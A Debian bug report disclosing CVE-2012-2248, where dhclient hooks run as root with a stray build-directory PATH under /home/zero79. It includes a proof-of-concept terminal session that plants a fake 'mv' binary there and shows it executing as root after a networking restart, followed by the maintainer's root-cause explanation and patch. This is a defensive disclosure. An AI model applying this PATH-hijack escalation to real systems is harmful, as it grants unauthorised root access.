[pkg-dhcp-devel] Bug#690532: CVE-2012-2248: backdoor for user "zero79" due to dhclient’s hook $PATH
Michael Stapelberg
stapelberg at debian.org
Mon Oct 15 09:31:40 UTC 2012
Package: isc-dhcp-client
Version: 4.2.2.dfsg.1-5
Severity: critical
Tags: security patch
While debugging another issue, Mithrandir, mbiebl and I stumbled upon
the following:
All hooks in /etc/dhcp/dhclient-enter-hooks.d, such as "samba" when the
samba package is installed, are called with a PATH environment variable
containing this:
PATH=/home/zero79/source/git/isc-dhcp/debian/tmp/usr/sbin:/sbin:/bin:/usr/sbin:/usr/bin
Since hooks (at least "samba") can call arbitrary commands and are
running as uid 0 (root), this poses a security issue when the following
assumptions are true:
1. The system you want to exploit has samba installed (or any other
package which comes with a dhclient-enter-hook).
2. The attacker has the possibility of obtaining the username "zero79"
and thus can create executable files in
/home/zero79/source/git/isc-dhcp/debian/tmp/usr/sbin
3. The DHCP hook needs to be called to trigger the exploit, which
happens at least on system start or after /etc/init.d/networking
restart, possibly also when just renewing the dhcp-lease
(unverified).
Here is a demonstration of this issue:
zero79@squeezevm:~$ id -a
uid=1001(zero79) gid=1001(zero79) groups=1001(zero79)
zero79@squeezevm:~$ mkdir -p source/git/isc-dhcp/debian/tmp/usr/sbin
zero79@squeezevm:~$ cat >source/git/isc-dhcp/debian/tmp/usr/sbin/mv <<'EOF'
#!/bin/sh
echo "my script is run as: $(whoami) $(id -a)" > /tmp/exploited
EOF
zero79@squeezevm:~$ chmod +x source/git/isc-dhcp/debian/tmp/usr/sbin/mv
root@squeezevm:~# /etc/init.d/networking restart
Restarting networking (via systemctl): networking.service.
root@squeezevm:~# ls -hltr /tmp
total 8.0K
-rw-r--r-- 1 root root 966 Oct 14 13:42 samba
-rw-r--r-- 1 root root 65 Oct 14 14:02 exploited
root@squeezevm:~# cat /tmp/exploited
my script is run as: root uid=0(root) gid=0(root) groups=0(root)
At this point, "zero79" has root access to the system.
Raphael Geissert has resolved this issue in a timely fashion; his
statement follows, and his patch is attached:
The insertion of that path does not appear to be malicious. Rather, it
appears to be a mistake in debian/rules as --prefix is set to
$(pwd)/debian/tmp/, instead of setting DESTDIR when calling make
install. client/Makefile.am defines CLIENT_PATH to
"PATH=$(sbindir):/sbin:/bin:/usr/sbin:/usr/bin", which is later injected
into the env.
Due to what appears to be a bug in squeeze's Makefile.am, squeeze is not
affected.
The attached patch fixes the problem.
Since I've already built the package for wheezy, I'm going to upload it.
-- System Information:
Debian Release: wheezy/sid
APT prefers testing
APT policy: (990, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: armel
i386
Kernel: Linux 3.5.0 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages isc-dhcp-client depends on:
ii debianutils 4.3.2
ii iproute 20120521-3
ii isc-dhcp-common 4.2.2.dfsg.1-5
ii libc6 2.13-35
isc-dhcp-client recommends no packages.
Versions of packages isc-dhcp-client suggests:
pn avahi-autoipd <none>
pn resolvconf <none>
-- no debconf information
Attachment: CVE-2012-2248.patch (text/x-diff, 1082 bytes):
<http://lists.alioth.debian.org/pipermail/pkg-dhcp-devel/attachments/20121015/000ec67f/attachment-0001.patch>